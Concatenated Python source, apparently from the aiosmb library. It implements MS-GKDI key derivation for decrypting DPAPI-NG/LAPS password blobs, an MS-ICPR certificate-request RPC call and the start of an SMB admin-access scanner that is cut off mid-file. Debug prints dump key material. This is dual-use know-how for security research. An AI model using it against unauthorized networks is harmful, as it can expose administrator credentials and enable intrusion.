		# Take away 2 for the final null padding
		domain = view[: domain_len - 2].tobytes().decode("utf-16-le")
		view = view[domain_len:]

		forest = view[: forest_len - 2].tobytes().decode("utf-16-le")
		view = view[forest_len:]

		return KeyIdentifier(
			version=version,
			flags=flags,
			l0=l0_index,
			l1=l1_index,
			l2=l2_index,
			root_key_identifier=root_key_identifier,
			key_info=key_info,
			domain_name=domain,
			forest_name=forest,
		)

@dataclasses.dataclass(frozen=True)
class KDFParameters:
	"""KDF Parameters

	The format and field descriptions for the key derivation function (KDF)
	parameters. The format of this struct is defined in
	`MS-GKDI 2.2.1 KDF Parameters`_.

	Args:
		hash_name: The name of the hash algorithm.

	.. _MS-GKDI 2.2.1 KDF Parameters:
		https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/9946aeff-a914-45e9-b9e5-6cb5b4059187
	"""

	hash_name: str

	@property
	def hash_algorithm(self) -> hashes.HashAlgorithm:
		"""The hash algorithm object."""
		if self.hash_name == "SHA1":
			return hashes.SHA1()
		elif self.hash_name == "SHA256":
			return hashes.SHA256()
		elif self.hash_name == "SHA384":
			return hashes.SHA384()
		elif self.hash_name == "SHA512":
			return hashes.SHA512()
		else:
			raise NotImplementedError(f"Unsupported hash algorithm {self.hash_name}")

	def pack(self) -> bytes:
		b_hash_name = (self.hash_name + "\00").encode("utf-16-le")
		return b"".join(
			[
				b"\x00\x00\x00\x00\x01\x00\x00\x00",
				len(b_hash_name).to_bytes(4, byteorder="little"),
				b"\x00\x00\x00\x00",
				b_hash_name,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> KDFParameters:
		view = memoryview(data)

		if view[:8].tobytes() != b"\x00\x00\x00\x00\x01\x00\x00\x00" or view[12:16].tobytes() != b"\x00\x00\x00\x00":
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		hash_length = int.from_bytes(view[8:12], byteorder="little")
		hash_name = view[16 : 16 + hash_length - 2].tobytes().decode("utf-16-le")

		return KDFParameters(hash_name=hash_name)


@dataclasses.dataclass(frozen=True)
class FFCDHParameters:
	"""FFC DH Parameters

	The field parameters for use in deriving finite field cryptography (FFC)
	Diffie-Hellman (DH) keys. The format of this struct is defined in
	`MS-GKDI 2.2.2 FFC DH Parameters`_.

	Args:
		key_length: The length of the public key.
		field_order: The large prime field order, otherwise known as p.
		generator: The generator of the subgroup, otherwise known as g.

	.. _MS-GKDI 2.2.2 FFC DH Parameters:
		https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/e15ae269-ee21-446a-a480-de3ea243db5f
	"""

	key_length: int
	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x44\x48\x50\x4D")
	field_order: int
	generator: int

	def pack(self) -> bytes:
		b_field_order = self.field_order.to_bytes(self.key_length, byteorder="big")
		b_generator = self.generator.to_bytes(self.key_length, byteorder="big")

		return b"".join(
			[
				(12 + len(b_field_order) + len(b_generator)).to_bytes(4, byteorder="little"),
				self.magic,
				self.key_length.to_bytes(4, byteorder="little"),
				b_field_order,
				b_generator,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> FFCDHParameters:
		view = memoryview(data)

		# length = int.from_bytes(view[:4], byteorder="little")
		if view[4:8].tobytes() != cls.magic:
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		key_length = int.from_bytes(view[8:12], byteorder="little")
		field_order = view[12 : 12 + key_length].tobytes()
		generator = view[12 + key_length : 12 + key_length + key_length].tobytes()

		return FFCDHParameters(
			key_length=key_length,
			field_order=int.from_bytes(field_order, byteorder="big"),
			generator=int.from_bytes(generator, byteorder="big"),
		)


@dataclasses.dataclass(frozen=True)
class FFCDHKey:
	"""FFC DH Key

	The finite field cryptography (FFC) Diffie-Hellman (DH) public key info.
	The format of this struct is defined in `MS-GKDI 2.2.3.1 FFC DH Key`_.

	Args:
		key_length: The length of the public key.
		field_order: The large prime field order, otherwise known as p.
		generator: The generator of the subgroup, otherwise known as g.
		public_key: The public key of the peer, otherwise known as y.

	.. _MS-GKDI 2.2.3.1 FFC DH Key:
		https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/f8770f01-036d-4bf6-a4cf-1bd0e3913404
	"""

	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x44\x48\x50\x42")
	key_length: int
	field_order: int
	generator: int
	public_key: int

	def pack(self) -> bytes:
		b_field_order = self.field_order.to_bytes(self.key_length, byteorder="big")
		b_generator = self.generator.to_bytes(self.key_length, byteorder="big")
		b_pub_key = self.public_key.to_bytes(self.key_length, byteorder="big")

		return b"".join(
			[
				self.magic,
				self.key_length.to_bytes(4, byteorder="little"),
				b_field_order,
				b_generator,
				b_pub_key,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> FFCDHKey:
		view = memoryview(data)

		if view[:4].tobytes() != cls.magic:
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		key_length = int.from_bytes(view[4:8], byteorder="little")

		field_order = view[8 : 8 + key_length].tobytes()
		view = view[8 + key_length :]

		generator = view[:key_length].tobytes()
		view = view[key_length:]

		public_key = view[:key_length].tobytes()

		return FFCDHKey(
			key_length=key_length,
			field_order=int.from_bytes(field_order, byteorder="big"),
			generator=int.from_bytes(generator, byteorder="big"),
			public_key=int.from_bytes(public_key, byteorder="big"),
		)


@dataclasses.dataclass(frozen=True)
class ECDHKey:
	"""ECDH Key

	The elliptic curve Diffie-Hellman (ECDH) public key info. The format of
	this struct is defined in `MS-GKDI 2.2.3.2 ECDH Key`_.

	Args:
		curve_name: The curve name used, currently only the curves P256, P384,
			P521 are supported.
		key_length: The length of the public key.
		x: The X coordinate of the point P.
		y: The Y coordinate of the point P.

	.. _MS-GKDI 2.2.3.2 ECDH Key:
		https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/24876a37-9a92-4187-9052-222bb6f85d4a
	"""

	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x45\x43\x4B")
	curve_name: str
	key_length: int
	x: int
	y: int

	@property
	def curve_and_hash(self) -> tuple[ec.EllipticCurve, hashes.HashAlgorithm]:
		return {
			"P256": (ec.SECP256R1(), hashes.SHA256()),
			"P384": (ec.SECP384R1(), hashes.SHA384()),
			"P521": (ec.SECP521R1(), hashes.SHA512()),
		}[self.curve_name]

	def pack(self) -> bytes:
		b_x = self.x.to_bytes(self.key_length, byteorder="big")
		b_y = self.y.to_bytes(self.key_length, byteorder="big")

		b_curve = {
			"P256": b"\x45\x43\x4B\x31",
			"P384": b"\x45\x43\x4B\x33",
			"P521": b"\x45\x43\x4B\x35",
		}.get(self.curve_name, None)
		if not b_curve:
			raise ValueError(f"Unknown curve '{self.curve_name}', cannot pack.")

		return b"".join(
			[
				b_curve,
				self.key_length.to_bytes(4, byteorder="little"),
				b_x,
				b_y,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> ECDHKey:
		view = memoryview(data)

		curve_id = int.from_bytes(view[:4], byteorder="little")
		curve = {
			0x314B4345: "P256",
			0x334B4345: "P384",
			0x354B4345: "P521",
		}.get(curve_id, None)
		if not curve:
			raise ValueError(f"Failed to unpack {cls.__name__} with unknown curve 0x{curve_id:08X}")

		length = int.from_bytes(view[4:8], byteorder="little")

		x = view[8 : 8 + length].tobytes()
		view = view[8 + length :]

		y = view[:length].tobytes()

		return ECDHKey(
			curve_name=curve,
			key_length=length,
			x=int.from_bytes(x, byteorder="big"),
			y=int.from_bytes(y, byteorder="big"),
		)


@dataclasses.dataclass(frozen=True)
class GroupKeyEnvelope:
	"""Group Key Envelope

	The group key envelope structure that describes the group key information
	returned by a GetKey RPC request. The format of this struct is defined in
	`MS-GKDI 2.2.4 Group Key Envelope`_.

	Args:
		version: The version of the structure, should be 1
		flags: Flags describing the values inside the structure
		l0: The L0 index of the key
		l1: The L1 index of the key
		l2: The L2 index of the key
		root_key_identifier: The key identifier
		kdf_algorithm: The KDF algorithm name.
		kdf_parameters: The KDF algorithm parameters
		secret_algorithm: The secret agreement algorithm name.
		secret_parameters: The secret agreement algorithm parameters.
		private_key_length: The private key length associated with the root key.
		public_key_length: The public key length associated with the root key.
		domain_name: The domain name of the server in DNS format.
		forest_name: The forest name of the server in DNS format.
		l1_key: The L1 seed key.
		l2_key: If is_public_key this is the public key, else this is the L2
			seed key.

	.. _MS-GKDI 2.2.4 Group Key Envelope
		https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/192c061c-e740-4aa0-ab1d-6954fb3e58f7
	"""

	version: int
	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x4B\x44\x53\x4B")
	flags: int
	l0: int
	l1: int
	l2: int
	root_key_identifier: uuid.UUID
	kdf_algorithm: str
	kdf_parameters: bytes
	secret_algorithm: str
	secret_parameters: bytes
	private_key_length: int
	public_key_length: int
	domain_name: str
	forest_name: str
	l1_key: bytes
	l2_key: bytes

	@property
	def is_public_key(self) -> bool:
		"""If True, the value of l2_key is the public key."""
		return bool(self.flags & 1)

	def pack(self) -> bytes:
		b_kdf_algorithm = (self.kdf_algorithm + "\00").encode("utf-16-le")
		b_secret_algorithm = (self.secret_algorithm + "\00").encode("utf-16-le")
		b_domain_name = (self.domain_name + "\00").encode("utf-16-le")
		b_forest_name = (self.forest_name + "\00").encode("utf-16-le")

		return b"".join(
			[
				self.version.to_bytes(4, byteorder="little"),
				self.magic,
				self.flags.to_bytes(4, byteorder="little"),
				self.l0.to_bytes(4, byteorder="little"),
				self.l1.to_bytes(4, byteorder="little"),
				self.l2.to_bytes(4, byteorder="little"),
				self.root_key_identifier.bytes_le,
				len(b_kdf_algorithm).to_bytes(4, byteorder="little"),
				len(self.kdf_parameters).to_bytes(4, byteorder="little"),
				len(b_secret_algorithm).to_bytes(4, byteorder="little"),
				len(self.secret_parameters).to_bytes(4, byteorder="little"),
				self.private_key_length.to_bytes(4, byteorder="little"),
				self.public_key_length.to_bytes(4, byteorder="little"),
				len(self.l1_key).to_bytes(4, byteorder="little"),
				len(self.l2_key).to_bytes(4, byteorder="little"),
				len(b_domain_name).to_bytes(4, byteorder="little"),
				len(b_forest_name).to_bytes(4, byteorder="little"),
				b_kdf_algorithm,
				self.kdf_parameters,
				b_secret_algorithm,
				self.secret_parameters,
				b_domain_name,
				b_forest_name,
				self.l1_key,
				self.l2_key,
			]
		)

	def get_kek(
		self,
		key_id: KeyIdentifier,
	) -> bytes:
		if self.is_public_key:
			raise ValueError("Current user is not authorized to retrieve the KEK information")
		if self.l0 != key_id.l0:
			raise ValueError(f"L0 index {self.l0} does not match the requested L0 index {key_id.l0}")

		if self.kdf_algorithm != "SP800_108_CTR_HMAC":
			raise NotImplementedError(f"Unknown KDF algorithm '{self.kdf_algorithm}'")

		kdf_parameters = KDFParameters.unpack(self.kdf_parameters)
		hash_algo = kdf_parameters.hash_algorithm
		l2_key = compute_l2_key(hash_algo, key_id.l1, key_id.l2, self)

		if key_id.is_public_key:
			print("Computing KEK from public key")
			#print all parameters
			print("hash_algo: ", hash_algo)
			print("l2_key: ", l2_key)
			print("secret_algorithm: ", self.secret_algorithm)
			print("secret_parameters: ", self.secret_parameters)
			print("key_id.key_info: ", key_id.key_info)
			print("private_key_length: ", math.ceil(self.private_key_length / 8))

			return compute_kek_from_public_key(
				algorithm=hash_algo,
				seed=l2_key,
				secret_algorithm=self.secret_algorithm,
				secret_parameters=self.secret_parameters,
				public_key=key_id.key_info,
				private_key_length=math.ceil(self.private_key_length / 8),
			)

		else:
			return kdf(
				hash_algo,
				l2_key,
				KDS_SERVICE_LABEL,
				key_id.key_info,
				32,
			)

	def new_kek(
		self,
	) -> tuple[bytes, KeyIdentifier]:
		if self.kdf_algorithm != "SP800_108_CTR_HMAC":
			raise NotImplementedError(f"Unknown KDF algorithm '{self.kdf_algorithm}'")

		kdf_parameters = KDFParameters.unpack(self.kdf_parameters)
		hash_algo = kdf_parameters.hash_algorithm

		if self.is_public_key:
			# If is_public_key flag is set, the L2 key is the peer's public key
			private_key = os.urandom(math.ceil(self.private_key_length / 8))
			kek = compute_kek(
				algorithm=hash_algo,
				secret_algorithm=self.secret_algorithm,
				secret_parameters=self.secret_parameters,
				private_key=private_key,
				public_key=self.l2_key,
			)

			key_info = compute_public_key(
				secret_algorithm=self.secret_algorithm,
				secret_parameters=self.secret_parameters,
				private_key=private_key,
				peer_public_key=self.l2_key,
			)
		else:
			key_info = os.urandom(32)
			kek = kdf(
				hash_algo,
				self.l2_key,
				KDS_SERVICE_LABEL,
				key_info,
				32,
			)

		key_identifier = KeyIdentifier(
			version=1,
			flags=self.flags,
			l0=self.l0,
			l1=self.l1,
			l2=self.l2,
			root_key_identifier=self.root_key_identifier,
			key_info=key_info,
			domain_name=self.domain_name,
			forest_name=self.forest_name,
		)
		return kek, key_identifier

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> GroupKeyEnvelope:
		view = memoryview(data)

		version = int.from_bytes(view[:4], byteorder="little")

		if view[4:8].tobytes() != cls.magic:
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		flags = int.from_bytes(view[8:12], byteorder="little")
		l0_index = int.from_bytes(view[12:16], byteorder="little")
		l1_index = int.from_bytes(view[16:20], byteorder="little")
		l2_index = int.from_bytes(view[20:24], byteorder="little")
		root_key_identifier = uuid.UUID(bytes_le=view[24:40].tobytes())
		kdf_algo_len = int.from_bytes(view[40:44], byteorder="little")
		kdf_para_len = int.from_bytes(view[44:48], byteorder="little")
		sec_algo_len = int.from_bytes(view[48:52], byteorder="little")
		sec_para_len = int.from_bytes(view[52:56], byteorder="little")
		priv_key_len = int.from_bytes(view[56:60], byteorder="little")
		publ_key_len = int.from_bytes(view[60:64], byteorder="little")
		l1_key_len = int.from_bytes(view[64:68], byteorder="little")
		l2_key_len = int.from_bytes(view[68:72], byteorder="little")
		domain_len = int.from_bytes(view[72:76], byteorder="little")
		forest_len = int.from_bytes(view[76:80], byteorder="little")
		view = view[80:]

		kdf_algo = view[: kdf_algo_len - 2].tobytes().decode("utf-16-le")
		view = view[kdf_algo_len:]

		kdf_param = view[:kdf_para_len].tobytes()
		view = view[kdf_para_len:]

		secret_algo = view[: sec_algo_len - 2].tobytes().decode("utf-16-le")
		view = view[sec_algo_len:]

		secret_param = view[:sec_para_len].tobytes()
		view = view[sec_para_len:]

		domain = view[: domain_len - 2].tobytes().decode("utf-16-le")
		view = view[domain_len:]

		forest = view[: forest_len - 2].tobytes().decode("utf-16-le")
		view = view[forest_len:]

		l1_key = view[:l1_key_len].tobytes()
		view = view[l1_key_len:]

		l2_key = view[:l2_key_len].tobytes()
		view = view[l2_key_len:]

		return GroupKeyEnvelope(
			version=version,
			flags=flags,
			l0=l0_index,
			l1=l1_index,
			l2=l2_index,
			root_key_identifier=root_key_identifier,
			kdf_algorithm=kdf_algo,
			kdf_parameters=kdf_param,
			secret_algorithm=secret_algo,
			secret_parameters=secret_param,
			private_key_length=priv_key_len,
			public_key_length=publ_key_len,
			domain_name=domain,
			forest_name=forest,
			l1_key=l1_key,
			l2_key=l2_key,
		)

################################################################################
# Key derivation functions
################################################################################
def kdf(
	algorithm: hashes.HashAlgorithm,
	secret: bytes,
	label: bytes,
	context: bytes,
	length: int,
) -> bytes:
	# KDF(HashAlg, KI, Label, Context, L)
	# where KDF is SP800-108 in counter mode.
	kdf = KBKDFHMAC(
		algorithm=algorithm,
		mode=Mode.CounterMode,
		length=length,
		label=label,
		context=context,
		# MS-SMB2 uses the same KDF function and my implementation that
		# sets a value of 4 seems to work so assume that's the case here.
		rlen=4,
		llen=4,
		location=CounterLocation.BeforeFixed,
		fixed=None,
	)
	return kdf.derive(secret)


def kdf_concat(
	algorithm: hashes.HashAlgorithm,
	shared_secret: bytes,
	algorithm_id: bytes,
	party_uinfo: bytes,
	party_vinfo: bytes,
	length: int,
) -> bytes:
	otherinfo = b"".join([algorithm_id, party_uinfo, party_vinfo])
	return ConcatKDFHash(
		algorithm,
		length=length,
		otherinfo=otherinfo,
	).derive(shared_secret)

def compute_l1_key(
	target_sd: bytes,
	root_key_id: uuid.UUID,
	l0: int,
	root_key: bytes,
	algorithm: hashes.HashAlgorithm,
) -> bytes:
	# Note: 512 is number of bits, we use byte length here
	# Key(SD, RK, L0, -1, -1) = KDF(
	#   HashAlg,
	#   RK.msKds-RootKeyData,
	#   "KDS service",
	#   RKID || L0 || 0xffffffff || 0xffffffff,
	#   512
	# )
	l0_seed = kdf(
		algorithm,
		root_key,
		KDS_SERVICE_LABEL,
		compute_kdf_context(root_key_id, l0, -1, -1),
		64,
	)

	# Key(SD, RK, L0, 31, -1) = KDF(
	#   HashAlg,
	#   Key(SD, RK, L0, -1, -1),
	#   "KDS service",
	#   RKID || L0 || 31 || 0xffffffff || SD,
	#   512
	# )
	return kdf(
		algorithm,
		l0_seed,
		KDS_SERVICE_LABEL,
		compute_kdf_context(root_key_id, l0, 31, -1) + target_sd,
		64,
	)


def compute_l2_key(
	algorithm: hashes.HashAlgorithm,
	request_l1: int,
	request_l2: int,
	rk: GroupKeyEnvelope,
) -> bytes:
	l1 = rk.l1
	l1_key = rk.l1_key
	l2 = rk.l2
	l2_key = rk.l2_key
	reseed_l2 = l2 == 31 or rk.l1 != request_l1

	# MS-GKDI 2.2.4 Group key Envelope
	# If the value in the L2 index field is equal to 31, this contains the
	# L1 key with group key identifier (L0 index, L1 index, -1). In all
	# other cases, this field contains the L1 key with group key identifier
	# (L0 index, L1 index - 1, -1). If this field is present, its length
	# MUST be equal to 64 bytes.
	if l2 != 31 and l1 != request_l1:
		l1 -= 1

	while l1 != request_l1:
		reseed_l2 = True
		l1 -= 1

		l1_key = kdf(
			algorithm,
			l1_key,
			KDS_SERVICE_LABEL,
			compute_kdf_context(
				rk.root_key_identifier,
				rk.l0,
				l1,
				-1,
			),
			64,
		)

	if reseed_l2:
		l2 = 31
		l2_key = kdf(
			algorithm,
			l1_key,
			KDS_SERVICE_LABEL,
			compute_kdf_context(
				rk.root_key_identifier,
				rk.l0,
				l1,
				l2,
			),
			64,
		)

	while l2 != request_l2:
		l2 -= 1

		l2_key = kdf(
			algorithm,
			l2_key,
			KDS_SERVICE_LABEL,
			compute_kdf_context(
				rk.root_key_identifier,
				rk.l0,
				l1,
				l2,
			),
			64,
		)

	return l2_key


def compute_kdf_context(
	key_guid: uuid.UUID,
	l0: int,
	l1: int,
	l2: int,
) -> bytes:
	return b"".join(
		[
			key_guid.bytes_le,
			l0.to_bytes(4, byteorder="little", signed=True),
			l1.to_bytes(4, byteorder="little", signed=True),
			l2.to_bytes(4, byteorder="little", signed=True),
		]
	)


def compute_kek_from_public_key(
	algorithm: hashes.HashAlgorithm,
	seed: bytes,
	secret_algorithm: str,
	secret_parameters: t.Optional[bytes],
	public_key: bytes,
	private_key_length: int,
) -> bytes:
	private_key = kdf(
		algorithm,
		seed,
		KDS_SERVICE_LABEL,
		(secret_algorithm + "\0").encode("utf-16-le"),
		private_key_length,
	)

	return compute_kek(
		algorithm,
		secret_algorithm=secret_algorithm,
		secret_parameters=secret_parameters,
		private_key=private_key,
		public_key=public_key,
	)


def compute_kek(
	algorithm: hashes.HashAlgorithm,
	secret_algorithm: str,
	secret_parameters: t.Optional[bytes],
	private_key: bytes,
	public_key: bytes,
) -> bytes:
	# Special thanks for Grzegorz Tworek (@0gtweet) and Michał Grzegorzewski
	# for providing access to CQDPAPINGPFXDecrypter.exe which contains the
	# BCrypt* APIs Microsoft use to derive the KEK.

	secret_hash_algorithm: hashes.HashAlgorithm
	if secret_algorithm == "DH":
		# p = FFCDHParameters.unpack(secret_parameters or b"")
		# We can derive the shared secret based on the DH formula.
		# s = y**x mod p
		dh_pub_key = FFCDHKey.unpack(public_key)
		shared_secret_int = pow(
			dh_pub_key.public_key,
			int.from_bytes(private_key, byteorder="big"),
			dh_pub_key.field_order,
		)
		shared_secret = shared_secret_int.to_bytes(dh_pub_key.key_length, byteorder="big")
		secret_hash_algorithm = hashes.SHA256()

	elif secret_algorithm.startswith("ECDH_P"):
		ecdh_pub_key_info = ECDHKey.unpack(public_key)
		curve, secret_hash_algorithm = ecdh_pub_key_info.curve_and_hash

		ecdh_pub_key = ec.EllipticCurvePublicNumbers(ecdh_pub_key_info.x, ecdh_pub_key_info.y, curve).public_key()
		ecdh_private = ec.derive_private_key(
			int.from_bytes(private_key, byteorder="big"),
			curve,
		)
		shared_secret = ecdh_private.exchange(ec.ECDH(), ecdh_pub_key)

	else:
		raise NotImplementedError(f"Unknown secret agreement algorithm '{secret_algorithm}'")

	# This part isn't documented but we use the key derivation algorithm
	# SP 800-56A to derive the kek secret input value. On Windows this uses
	# BCryptDeriveKey with the following parameters.
	#   KDF_ALGORITHMID - SHA512
	#   KDF_PARTYUINFO  - KDS public key
	#   KDF_PARTYVINFO  - KDS service
	# Each of these is just appended to the otherinfo value used in
	# cryptography as the UTF-16-LE NULL terminated strings.
	kek_context = "KDS public key\0".encode("utf-16-le")
	secret = kdf_concat(
		secret_hash_algorithm,
		shared_secret,
		algorithm_id="SHA512\0".encode("utf-16-le"),
		party_uinfo=kek_context,
		party_vinfo=KDS_SERVICE_LABEL,
		length=secret_hash_algorithm.digest_size,
	)

	return kdf(
		algorithm,
		secret,
		KDS_SERVICE_LABEL,
		kek_context,
		32,
	)


def compute_public_key(
	secret_algorithm: str,
	secret_parameters: t.Optional[bytes],
	private_key: bytes,
	peer_public_key: bytes,
) -> bytes:
	if secret_algorithm == "DH":
		dh_pub_key = FFCDHKey.unpack(peer_public_key)

		# We can derive our public key based on the DH formula.
		# X = G**x mod p
		my_pub_key = pow(
			dh_pub_key.generator,
			int.from_bytes(private_key, byteorder="big"),
			dh_pub_key.field_order,
		)
		return FFCDHKey(
			dh_pub_key.key_length,
			dh_pub_key.field_order,
			dh_pub_key.generator,
			my_pub_key,
		).pack()

	elif secret_algorithm.startswith("ECDH_P"):
		ecdh_pub_key = ECDHKey.unpack(peer_public_key)
		curve = ecdh_pub_key.curve_and_hash[0]

		ecdh_private = ec.derive_private_key(
			int.from_bytes(private_key, byteorder="big"),
			curve,
		)
		my_ecdh_pub_key = ecdh_private.public_key().public_numbers()

		return ECDHKey(
			ecdh_pub_key.curve_name,
			ecdh_pub_key.key_length,
			my_ecdh_pub_key.x,
			my_ecdh_pub_key.y,
		).pack()

	else:
		raise NotImplementedError(f"Unknown secret agreement algorithm '{secret_algorithm}'")


class AlgorithmOID(str, enum.Enum):
	"""OIDs for cryptographic algorithms."""

	AES256_WRAP = "2.16.840.1.101.3.4.1.45"
	AES256_GCM = "2.16.840.1.101.3.4.1.46"

def cek_decrypt(
	algorithm: str,
	parameters: t.Optional[bytes],
	kek: bytes,
	value: bytes,
) -> bytes:
	if algorithm == 'aes256_wrap':
		print('kek  : %s' % kek.hex())
		print('value: %s' % value.hex())
		return keywrap.aes_key_unwrap(kek, value)
	else:
		raise NotImplementedError(f"Unknown cek encryption algorithm OID '{algorithm}'")

def content_decrypt(
	algorithm: str,
	parameters: t.Optional[bytes],
	cek: bytes,
	value: bytes,
) -> bytes:
	if algorithm == 'aes256_gcm':
		if not parameters:
			raise ValueError("Expecting parameters for AES256 GCM decryption but received none.")

		print('cek  : %s' % cek.hex())
		print('value: %s' % value.hex())

		iv = parameters['0']
		cipher = AESGCM(cek)
		return cipher.decrypt(iv, value, None)

	else:
		raise NotImplementedError(f"Unknown content encryption algorithm OID '{algorithm}'")

def decrypt_blob(
	blob: DPAPINGBlob,
	key: GroupKeyEnvelope,
) -> bytes:
	kek = key.get_kek(blob.key_identifier)

	# With the kek we can unwrap the encrypted cek in the LAPS payload.
	cek = cek_decrypt(
		blob.enc_cek_algorithm,
		blob.enc_cek_parameters,
		kek,
		blob.enc_cek,
	)

	# With the cek we can decrypt the encrypted content in the LAPS payload.
	return content_decrypt(
		blob.enc_content_algorithm,
		blob.enc_content_parameters,
		cek,
		blob.enc_content,
	)

################################################################################
# RPC CALLS
################################################################################
# 3.1.4.1 BackuprKey(Opnum 0)
class GetKey(NDRCALL):
	opnum = 0
	structure = (
	   ('cbTargetSD', ULONG),
	   ('pTargetSD', BYTE_ARRAY),
	   ('pRootKeyID', PGUID),
	   ('L0KeyID', LONG),
	   ('L1KeyID', LONG),
	   ('L2KeyID', LONG),
	)

class GetKeyResponse(NDRCALL):
	structure = (
		('pcbOut', ULONG),
		('ppbOut', PBYTE_ARRAY),
	)

################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
 0 : (GetKey, GetKeyResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################
async def hGetKey(dce, targetSD, rootKey, L0KeyID, L1KeyID, L2KeyID):
	request = GetKey()
	request['pTargetSD'] = targetSD
	if targetSD == NULL:
		request['cbTargetSD'] = 0
	else:
		request['cbTargetSD'] = len(targetSD)
	request['pRootKeyID'] = rootKey
	request['L0KeyID'] = L0KeyID
	request['L1KeyID'] = L1KeyID
	request['L2KeyID'] = L2KeyID
	return await dce.request(request)



#
# Author: Tamas Jos (@skelsec)
#
# Description:
#   [MS-ICPR] ICertPassage Interface implementation
#
#
#   Some calls have helper functions, which makes it even easier to use.
#   They are located at the end of this file. 
#   Helper functions start with "h"<name of the call>.
#   There are test cases for them too. 
#

from aiosmb.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, LPBYTE, NULL, DWORD_PTR
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin
from aiosmb.dcerpc.v5 import system_errors, hresult_errors
from aiosmb.commons.exceptions import SMBException
from aiosmb.dcerpc.v5.structure import Structure


MSRPC_UUID_ICPR  = uuidtup_to_bin(('91ae6020-9e3c-11cf-8d7c-00aa00c091be','0.0'))

class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)

	def __str__( self ):
		key = self.error_code
		if key in hresult_errors.ERROR_MESSAGES:
			error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
			error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
			return 'ICPR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
		elif key & 0xffff in system_errors.ERROR_MESSAGES:
			error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
			error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
			return 'ICPR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
		else:
			return 'ICPR SessionError: unknown error code: 0x%x' % self.error_code

################################################################################
# CONSTANTS
################################################################################


################################################################################
# STRUCTURES
################################################################################

class CERTTRANSBLOB(NDRSTRUCT):
	structure = (
		('cbData',ULONG),
		('pbData', LPBYTE),
	)

class LPCERTTRANSBLOB(NDRPOINTER):
	referent = (
		('Data', CERTTRANSBLOB),
	)



################################################################################
# RPC CALLS
################################################################################
# 3.2.5.4.1 SchRpcHighestVersion (Opnum 0)
class CertServerRequest(NDRCALL):
	opnum = 0
	structure = (
		('dwFlags', DWORD),
		('pwszAuthority', LPWSTR),
		('pdwRequestId', DWORD_PTR),
		('pctbAttribs', CERTTRANSBLOB),
		('pctbRequest', CERTTRANSBLOB),
		
	)

class CertServerRequestResponse(NDRCALL):
	structure = (
		('pdwRequestId', DWORD_PTR),
		('pdwDisposition', DWORD_PTR),
		('pctbCert', CERTTRANSBLOB),
		('pctbEncodedCert', CERTTRANSBLOB),
		('pctbDispositionMessage', CERTTRANSBLOB),
		('ErrorCode', ULONG),
	)


################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
 0 : (CertServerRequest,CertServerRequestResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################
def checkNullString(string):
	if string == NULL:
		return string

	if string[-1:] != '\x00':
		return string + '\x00'
	else:
		return string

async def hCertServerRequest(dce, service, csr, dwFlags = 0, pdwRequestId = 1, pctbAttribs = ""):
	request = CertServerRequest()
	request['dwFlags'] = dwFlags
	request['pwszAuthority'] = checkNullString(service)
	request['pdwRequestId'] = pdwRequestId

	pctbAttribs = checkNullString(pctbAttribs)
	pctbAttribs = pctbAttribs.encode('utf-16-le')
	attribsblob = CERTTRANSBLOB()
	attribsblob['cbData'] = len(pctbAttribs)
	attribsblob['pbData'] = pctbAttribs
	request['pctbAttribs'] = attribsblob
	
	csr_request = CERTTRANSBLOB()
	csr_request['cbData'] = len(csr)
	csr_request['pbData'] = csr
	request['pctbRequest'] = csr_request

	return await dce.request(request)




from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.share import SMBShare
from aiosmb.dcerpc.v5.interfaces.remoteregistry import RRPRPC
from aiosmb.dcerpc.v5.interfaces.servicemanager import REMSVCRPC

class SMBAdminRes:
	def __init__(self, share, servicemgr, registry):
		self.share = share
		self.servicemgr = servicemgr
		self.registry = registry

	def get_header(self):
		return ['SHARE', 'SERVICE', 'REGISTRY']

	def to_line(self, separator = '\t'):
		return separator.join([str(self.share), str(self.servicemgr), str(self.registry)])

class SMBAdminScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err
				
				share_access = False
				service_access = False
				registry_access = False

				share = SMBShare(
					name = 'ADMIN$',
